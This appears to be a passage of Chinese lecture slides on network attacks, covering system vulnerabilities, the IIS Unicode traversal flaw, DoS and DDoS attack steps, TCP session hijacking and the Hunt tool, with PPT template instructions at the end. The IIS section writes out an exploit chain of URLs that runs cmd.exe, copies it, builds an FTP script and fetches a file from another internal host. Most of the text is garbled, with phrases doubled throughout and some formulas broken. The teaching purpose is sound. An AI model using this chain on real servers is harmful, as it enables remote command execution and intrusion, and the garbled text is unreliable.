《工学网络攻击PPT课件》由会员分享,可在线阅读,更多相关《工学网络攻击PPT课件(39页珍藏版)》请在金锄头文库上搜索。
1、系统漏洞和后门系统漏洞和后门n系统漏洞是程序中无意造成的缺陷,它系统漏洞是程序中无意造成的缺陷,它形成了一个不被注意的通道。漏洞也指形成了一个不被注意的通道。漏洞也指无意的配置错误,如使用默认服务器配无意的配置错误,如使用默认服务器配置。置。n后门是一个在操作系统或程序中无证明后门是一个在操作系统或程序中无证明文件的通道,通常是由软件开发人员故文件的通道,通常是由软件开发人员故意放置在那里的,以便他们能够快速对意放置在那里的,以便他们能够快速对产品进行支持。产品进行支持。 IIS UNICODE 漏洞nNSFOCUS安全小组发现安全小组发现IIS 4.0和和IIS 5.0在在Unicode字符
2、解码的实现中存在一个字符解码的实现中存在一个安全漏洞,导致用户可以远程通过安全漏洞,导致用户可以远程通过IIS执执行任意命令。当行任意命令。当IIS打开文件时,如果该打开文件时,如果该文件名包含文件名包含unicode字符,它会对其进行字符,它会对其进行解码,如果用户提供一些特殊的编码,解码,如果用户提供一些特殊的编码,将导致将导致IIS错误的打开或者执行某些错误的打开或者执行某些web根目录以外的文件。根目录以外的文件。IIS UNICODE 漏洞n对于对于IIS 5.0/4.0中文版,当中文版,当IIS收到的收到的URL请求请求的文件名中包含一个特殊的编码例如的文件名中包含一个特殊的编码例
3、如%c1%hh或者或者%c0%hh,它会首先将其解码变成它会首先将其解码变成:0xc10xhh, 然后尝试打开这个文件,然后尝试打开这个文件,Windows 系统认为系统认为0xc10xhh可能是可能是unicode编编码,因此它会首先将其解码,如果码,因此它会首先将其解码,如果 0x00= %hh (0xc1 - 0xc0) * 0x40 + 0xhh%c0%hh - (0xc0 - 0xc0) * 0x40 + 0xhhIIS UNICODE 漏洞n因此,利用这种编码,我们可以构造很多字符,因此,利用这种编码,我们可以构造很多字符,例如例如:%c1%1c - (0xc1 - 0xc0) *
4、 0x40 + 0x1c = 0x5c = /%c0%2f - (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = 攻击者可以利用这个漏洞来绕过攻击者可以利用这个漏洞来绕过IIS的路径的路径检查,去执行或者打开任意的文件。检查,去执行或者打开任意的文件。 IIS UNICODE 漏洞如果系统包含某个可执行目录,就可能执行任意如果系统包含某个可执行目录,就可能执行任意系统命令。系统命令。n下面的下面的URL可能列出当前目录的内容:可能列出当前目录的内容:http:/目标主机/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+dirn利用这
5、个漏洞查看系统文件内容也是可能的利用这个漏洞查看系统文件内容也是可能的:http:/目标主机/a.asp/.%c1%1c./.%c1%1c./winnt/win.iniIIS漏洞nhttp:/192.168.0.2/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+dirnhttp:/192.168.0.2/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+ccc.exenhttp:/192.168.0.2/scripts/ccc.exe?/c+echo+open+g
6、etfilenhttp:/192.168.0.2/scripts/ccc.exe?/c+type+getfilenhttp:/192.168.0.2/scripts/ccc.exe?/c+echo+192.168.0.111+getfilenhttp:/192.168.0.2/scripts/ccc.exe?/c+echo+administrator+getfilenhttp:/192.168.0.2/scripts/ccc.exe?/c+echo+123456+getfilenhttp:/192.168.0.2/scripts/ccc.exe?/c+echo+get+synful+getfi
7、lenhttp:/192.168.0.2/scripts/ccc.exe?/c+echo+quit+getfilenhttp:/192.168.0.2/scripts/ccc.exe?/c+ftp+-s:getfile拒绝服务攻击拒绝服务攻击nDoS(Denial of Service),其目的是),其目的是使计算机或网络无法提供正常的服务。使计算机或网络无法提供正常的服务。最常见的最常见的DoS攻击有攻击有计算机网络带宽攻计算机网络带宽攻击击和和连通性攻击连通性攻击。拒绝服务攻击拒绝服务攻击n带宽攻击带宽攻击指以极大的通信量冲击网络,指以极大的通信量冲击网络,使得所有可用网络资源都被消耗殆尽
8、,使得所有可用网络资源都被消耗殆尽,最后导致合法的用户请求就无法通过。最后导致合法的用户请求就无法通过。n连通性攻击连通性攻击指用大量的连接请求冲击计指用大量的连接请求冲击计算机,使得所有可用的操作系统资源都算机,使得所有可用的操作系统资源都被消耗殆尽,最终计算机无法再处理合被消耗殆尽,最终计算机无法再处理合法用户的请求法用户的请求 分布式拒绝服务攻击分布式拒绝服务攻击n(DDoS,Distributed Denial of Service) 指借助于客户指借助于客户/服务器技术,将多个计算服务器技术,将多个计算机联合起来作为攻击平台,对一个或多机联合起来作为攻击平台,对一个或多个目标发动个目
9、标发动DoS攻击,从而成倍地提高拒攻击,从而成倍地提高拒绝服务攻击的威力。绝服务攻击的威力。分布式拒绝服务攻击分布式拒绝服务攻击nDDoS攻击手段是在传统的攻击手段是在传统的DoS攻击基础攻击基础之上产生的一类攻击方式。单一的之上产生的一类攻击方式。单一的DoS攻攻击一般是采用一对一方式的,当攻击目击一般是采用一对一方式的,当攻击目标标CPU速度低、内存小或者网络带宽小速度低、内存小或者网络带宽小等等各项性能指标不高时,它的效果是等等各项性能指标不高时,它的效果是明显的。明显的。分布式拒绝服务攻击分布式拒绝服务攻击n随着计算机与网络技术的发展,计算机随着计算机与网络技术的发展,计算机的处理能力
10、迅速增长,内存大大增加,的处理能力迅速增长,内存大大增加,同时也出现了千兆级别的网络,这使得同时也出现了千兆级别的网络,这使得DoS攻击的困难程度加大了攻击的困难程度加大了目标对恶目标对恶意攻击包的意攻击包的消化能力消化能力加强了不少,例加强了不少,例如你的攻击软件每秒钟可以发送如你的攻击软件每秒钟可以发送3,000个个攻击包,但我的主机与网络带宽每秒钟攻击包,但我的主机与网络带宽每秒钟可以处理可以处理10,000个攻击包,这样一来攻个攻击包,这样一来攻击就不会产生什么效果。击就不会产生什么效果。 分布式拒绝服务攻击分布式拒绝服务攻击n高速广泛连接的网络给大家带来了方便,也为高速广泛连接的网络
11、给大家带来了方便,也为DDoS攻击创造了极为有利的条件。在低速网攻击创造了极为有利的条件。在低速网络时代时,黑客占领攻击用的傀儡机时,总是络时代时,黑客占领攻击用的傀儡机时,总是会优先考虑离目标网络距离近的机器,因为经会优先考虑离目标网络距离近的机器,因为经过路由器的跳数少,效果好。而现在电信骨干过路由器的跳数少,效果好。而现在电信骨干节点之间的连接都是以节点之间的连接都是以G为级别的,大城市之为级别的,大城市之间更可以达到间更可以达到2.5G的连接,这使得攻击可以从的连接,这使得攻击可以从更远的地方或者其他城市发起,攻击者的傀儡更远的地方或者其他城市发起,攻击者的傀儡机位置可以在分布在更大的
12、范围,选择起来更机位置可以在分布在更大的范围,选择起来更灵活了。灵活了。 分布式拒绝服务攻击分布式拒绝服务攻击n通常,攻击者使用一个偷窃帐号将通常,攻击者使用一个偷窃帐号将DDoS主控程序安装在一个计算机上,在一个主控程序安装在一个计算机上,在一个设定的时间主控程序将与大量代理程序设定的时间主控程序将与大量代理程序通讯,代理程序已经被安装在通讯,代理程序已经被安装在Internet上上的许多计算机上。代理程序收到指令时的许多计算机上。代理程序收到指令时就发动攻击。利用客户就发动攻击。利用客户/服务器技术,主服务器技术,主控程序能在几秒钟内激活成百上千次代控程序能在几秒钟内激活成百上千次代理程序
13、的运行。理程序的运行。 DDOS攻击的步骤攻击的步骤1.搜集了解目标的情况搜集了解目标的情况下列情况是黑客非常关心的情报:下列情况是黑客非常关心的情报: n被攻击目标主机数目、地址情况被攻击目标主机数目、地址情况 n目标主机的配置、性能目标主机的配置、性能 n目标的带宽目标的带宽DDOS攻击的步骤攻击的步骤2. 占领傀儡机占领傀儡机黑客最感兴趣的是有下列情况的主机:黑客最感兴趣的是有下列情况的主机: n链路状态好的主机链路状态好的主机 n性能好的主机性能好的主机 n安全管理水平差的主机安全管理水平差的主机2. 占领傀儡机占领傀儡机n这一部分实际上是使用了另一大类的攻这一部分实际上是使用了另一大
14、类的攻击手段:利用形攻击。这是和击手段:利用形攻击。这是和DDoS并列并列的攻击方式。简单地说,就是占领和控的攻击方式。简单地说,就是占领和控制被攻击的主机。取得最高的管理权限,制被攻击的主机。取得最高的管理权限,或者至少得到一个有权限完成或者至少得到一个有权限完成DDoS攻击攻击任务的帐号。任务的帐号。占领傀儡机占领傀儡机n对于一个对于一个DDoS攻击者来说,准备好一定攻击者来说,准备好一定数量的傀儡机是一个必要的条件,下面数量的傀儡机是一个必要的条件,下面说一下他是如何攻击并占领它们的。说一下他是如何攻击并占领它们的。 占领傀儡机占领傀儡机n首先,黑客做的工作一般是扫描,随机地或者首先,黑
15、客做的工作一般是扫描,随机地或者是有针对性地利用扫描器去发现互联网上那些是有针对性地利用扫描器去发现互联网上那些有漏洞的机器,随后就是尝试入侵了,有漏洞的机器,随后就是尝试入侵了,n黑客现在占领了一台傀儡机之后,除了做留后黑客现在占领了一台傀儡机之后,除了做留后门擦脚印这些基本工作之外,他会把门擦脚印这些基本工作之外,他会把DDoS攻攻击用的程序上载过去,一般是利用击用的程序上载过去,一般是利用ftp。在攻。在攻击机上,会有一个击机上,会有一个DDoS的发包程序,黑客就的发包程序,黑客就是利用它来向受害目标发送恶意攻击包的。是利用它来向受害目标发送恶意攻击包的。 DDOS攻击的步骤攻击的步骤3
16、. 实际攻击实际攻击n经过精心准备之后,黑客就象图示里的那样,经过精心准备之后,黑客就象图示里的那样,登录到做为控制台的傀儡机,向所有的攻击机登录到做为控制台的傀儡机,向所有的攻击机发出命令。这时候埋伏在攻击机中的发出命令。这时候埋伏在攻击机中的DDoS攻攻击程序就会响应控制台的命令,一起向受害主击程序就会响应控制台的命令,一起向受害主机以高速度发送大量的数据包,导致它死机或机以高速度发送大量的数据包,导致它死机或是无法响应正常的请求。是无法响应正常的请求。n老到的攻击者一边攻击,还会用各种手段来监老到的攻击者一边攻击,还会用各种手段来监视攻击的效果,在需要的时候进行一些调整。视攻击的效果,在
17、需要的时候进行一些调整。简单些就是开个窗口不断地简单些就是开个窗口不断地ping目标主机,在目标主机,在能接到回应的时候就再加大一些流量或是再命能接到回应的时候就再加大一些流量或是再命令更多的傀儡机来加入攻击令更多的傀儡机来加入攻击。 会话劫持会话劫持n你你Telnet到某台主机,这就是一次到某台主机,这就是一次Telnet会话;会话;你浏览某个网站,这就是一次你浏览某个网站,这就是一次HTTP会话。而会话。而会会话劫持话劫持(Session Hijack),就是结合了),就是结合了嗅探嗅探以及以及欺骗欺骗技术在内的攻击手段。在一次正常的技术在内的攻击手段。在一次正常的会话过程当中,攻击者作为
18、第三方参与到其中,会话过程当中,攻击者作为第三方参与到其中,他可以在正常数据包中插入恶意数据,也可以他可以在正常数据包中插入恶意数据,也可以在双方的会话当中进行监听,甚至可以是代替在双方的会话当中进行监听,甚至可以是代替某一方主机接管会话。某一方主机接管会话。 会话劫持原理会话劫持原理n会话劫持利用了会话劫持利用了TCP/IP工作原理来设计工作原理来设计攻击。攻击。TCP使用端到端的连接,即(源使用端到端的连接,即(源IP,源,源TCP端口号,目的端口号,目的IP,目的,目的TCP端号)端号)来唯一标识每一条已经建立连接的来唯一标识每一条已经建立连接的TCP链链路。另外,路。另外,TCP在进行
19、数据传输时,在进行数据传输时,TCP报文首部的两个字段序号(报文首部的两个字段序号(seq)和确认)和确认序号(序号(ackseq)非常重要。)非常重要。会话劫持原理会话劫持原理n序号(序号(seq)和确认序号()和确认序号(ackseq)是与所携带是与所携带TCP数据净荷(数据净荷(payload)的多少有数值上的关系:序号字)的多少有数值上的关系:序号字段(段(seq)指出了本报文中传送的数)指出了本报文中传送的数据在发送主机所要传送的整个数据据在发送主机所要传送的整个数据流中的顺序号,而确认序号字段流中的顺序号,而确认序号字段(ackseq)指出了发送本报文的主)指出了发送本报文的主机希
20、望接收的对方主机中下一个八机希望接收的对方主机中下一个八位组的顺序号。位组的顺序号。会话劫持原理会话劫持原理n因此,对于一台主机来说,其收发因此,对于一台主机来说,其收发的两个相临的两个相临TCP报文之间的序号和确报文之间的序号和确认序号的关系为:它所要发出的报认序号的关系为:它所要发出的报文中的文中的seq值应等于它所刚收到的报值应等于它所刚收到的报文中的文中的ackseq的值,而它所要发送的值,而它所要发送报文中报文中ackseq的值应为它所收到报的值应为它所收到报文中文中seq的值加上该报文中所发送的的值加上该报文中所发送的TCP净荷的长度。净荷的长度。 会话劫持原理会话劫持原理nTCP
21、会话劫持的攻击方式可以对基于会话劫持的攻击方式可以对基于TCP的任的任何应用发起攻击何应用发起攻击。n对于攻击者来说,所必须要做的就是窥探到正对于攻击者来说,所必须要做的就是窥探到正在进行在进行TCP通信的两台主机之间传送的报文,通信的两台主机之间传送的报文,这样攻击者就可以得知该报文的源这样攻击者就可以得知该报文的源IP、源、源TCP端口号、目的端口号、目的IP、目的、目的TCP端号,从而可以得端号,从而可以得知其中一台主机对将要收到的下一个知其中一台主机对将要收到的下一个TCP报文报文段中段中seq和和ackseq值的要求。值的要求。会话劫持原理会话劫持原理n这样,在该合法主机收到另一台合
22、法主这样,在该合法主机收到另一台合法主机发送的机发送的TCP报文前,攻击者根据所截获报文前,攻击者根据所截获的信息向该主机发出一个带有净荷的的信息向该主机发出一个带有净荷的TCP报文,如果该主机先收到攻击报文,就报文,如果该主机先收到攻击报文,就可以把合法的可以把合法的TCP会话建立在攻击主机与会话建立在攻击主机与被攻击主机之间。被攻击主机之间。会话劫持原理会话劫持原理n带有净荷的攻击报文能够使被攻击主机对下一带有净荷的攻击报文能够使被攻击主机对下一个要收到的个要收到的TCP报文中的确认序号报文中的确认序号(ackseq)的值的要求发生变化,从而使另)的值的要求发生变化,从而使另一台合法的主机
23、向被攻击主机发出的报文被被一台合法的主机向被攻击主机发出的报文被被攻击主机拒绝。攻击主机拒绝。TCP会话劫持攻击方式的好处会话劫持攻击方式的好处在于使攻击者避开了被攻击主机对访问者的身在于使攻击者避开了被攻击主机对访问者的身份验证和安全认证,从而使攻击者直接进入对份验证和安全认证,从而使攻击者直接进入对被攻击主机的的访问状态,因此对系统安全构被攻击主机的的访问状态,因此对系统安全构成的威胁比较严重。成的威胁比较严重。 会话劫持分类会话劫持分类n我们可以把会话劫持攻击分为两种类型:我们可以把会话劫持攻击分为两种类型:1)中间人攻击中间人攻击(Man In The Middle,简称,简称MITM
24、),2)注射式攻击()注射式攻击(Injection);并且还可以把);并且还可以把会话劫持攻击分为两种形式:会话劫持攻击分为两种形式:1)被动劫持,)被动劫持,2)主动劫持;被动劫持实际上就是在后台监)主动劫持;被动劫持实际上就是在后台监视双方会话的数据流,从中获得敏感数据;而视双方会话的数据流,从中获得敏感数据;而主动劫持则是将会话当中的某一台主机主动劫持则是将会话当中的某一台主机“踢踢”下线,然后由攻击者取代并接管会话,下线,然后由攻击者取代并接管会话,中间人攻击中间人攻击 Man-in-the-MiddleAttack,(简称简称“MITM攻击攻击”)是一种)是一种“间接间接”的入侵攻
25、击,的入侵攻击,这种攻击模式通过各种技术手段将受入这种攻击模式通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计连接中的两台通信计算机之间,这台计算机就称为算机就称为“中间人中间人”。中间人攻击中间人攻击 然后入侵者把这台计算机模拟一台或两台然后入侵者把这台计算机模拟一台或两台原始计算机,使原始计算机,使“中间人中间人”能够与原始能够与原始计算机建立活动连接并允许其读取或修计算机建立活动连接并允许其读取或修改传递的信息,然而两个原始计算机用改传递的信息,然而两个原始计算机用户却认为他们是在互相通信。通常,这户却认为他们是
26、在互相通信。通常,这种种“拦截数据拦截数据修改数据修改数据发送数发送数据据”的过程就被称为的过程就被称为“会话劫持会话劫持”(SessionHijack)。 注射式攻击注射式攻击n它不会改变会话双方的通讯流,而是在双方正它不会改变会话双方的通讯流,而是在双方正常的通讯流插入恶意数据。在注射式攻击中,常的通讯流插入恶意数据。在注射式攻击中,需要实现两种技术:需要实现两种技术:1)IP欺骗,欺骗,2)预测预测TCP序列号。如果是序列号。如果是UDP协议,只需伪造协议,只需伪造IP地址,地址,然后发送过去就可以了,因为然后发送过去就可以了,因为UDP没有所谓的没有所谓的TCP三次握手,但基于三次握手
27、,但基于UDP的应用协议有流控的应用协议有流控机制,所以也要做一些额外的工作。对于机制,所以也要做一些额外的工作。对于IP欺欺骗,有两种情况需要用到:骗,有两种情况需要用到:1)隐藏自己的隐藏自己的IP地址;地址;2)利用两台机器之间的信任关系实施利用两台机器之间的信任关系实施入侵。入侵。 huntnl/w/r) list/watch/reset connectionsnl(字母字母l)为查看当前网络上的会话为查看当前网络上的会话;nw为监视当前网络上的某个会话为监视当前网络上的某个会话;nr为重置当前网络上的某个会话。为重置当前网络上的某个会话。huntna) arp/simple hija
28、ck (avoids ack storm if arp used)n中间人攻击中间人攻击(会话劫持会话劫持),Hunt先进行先进行ARP欺骗,然后欺骗,然后进行会话劫持。使用此方法可以避免出现进行会话劫持。使用此方法可以避免出现ACK风暴。风暴。ns) simple hijackn简单的会话劫持,也就是注射式攻击。会出现简单的会话劫持,也就是注射式攻击。会出现ACK风暴。风暴。nd) daemons rst/arp/sniff/macn该选项共实现四个功能,分别为:终止会话,自动发该选项共实现四个功能,分别为:终止会话,自动发送带送带RST标志位的标志位的TCP包包;ARP欺骗后进行数据包转发
29、欺骗后进行数据包转发;嗅探功能嗅探功能;在当前网络上收集在当前网络上收集MAC地址。地址。赠送精美图标1、字体安装与、字体安装与设置置如果您对PPT模板中的字体风格不满意,可进行批量替换,一次性更改各页面字体。1.在“开始”选项卡中,点击“替换”按钮右侧箭头,选择“替换字体”。(如下图)2.在图“替换”下拉列表中选择要更改字体。(如下图)3.在“替换为”下拉列表中选择替换字体。4.点击“替换”按钮,完成。382、替、替换模板中的模板中的图片片模板中的图片展示页面,您可以根据需要替换这些图片,下面介绍两种替换方法。方法一:更改图片方法一:更改图片1.选中模版中的图片(有些图片与其他对象进行了组合,选择时一定要选中图片本身,而不是组合)。2.单击鼠标右键,选择“更改图片”,选择要替换的图片。(如下图)注意:注意:为防止替换图片发生变形,请使用与原图长宽比例相同的图片。38PPT放映设置PPT放映场合不同,放映的要求也不同,下面将例举几种常用的放映设置方式。让让PPT停止自动播放停止自动播放1. 单击”幻灯片放映”选项卡,去除“使用计时”选项即可。让让PPT进行循环播放进行循环播放1.单击”幻灯片放映”选项卡中的“设置幻灯片放映”,在弹出对话框中勾选“循环放映,按ESC键终止”。39
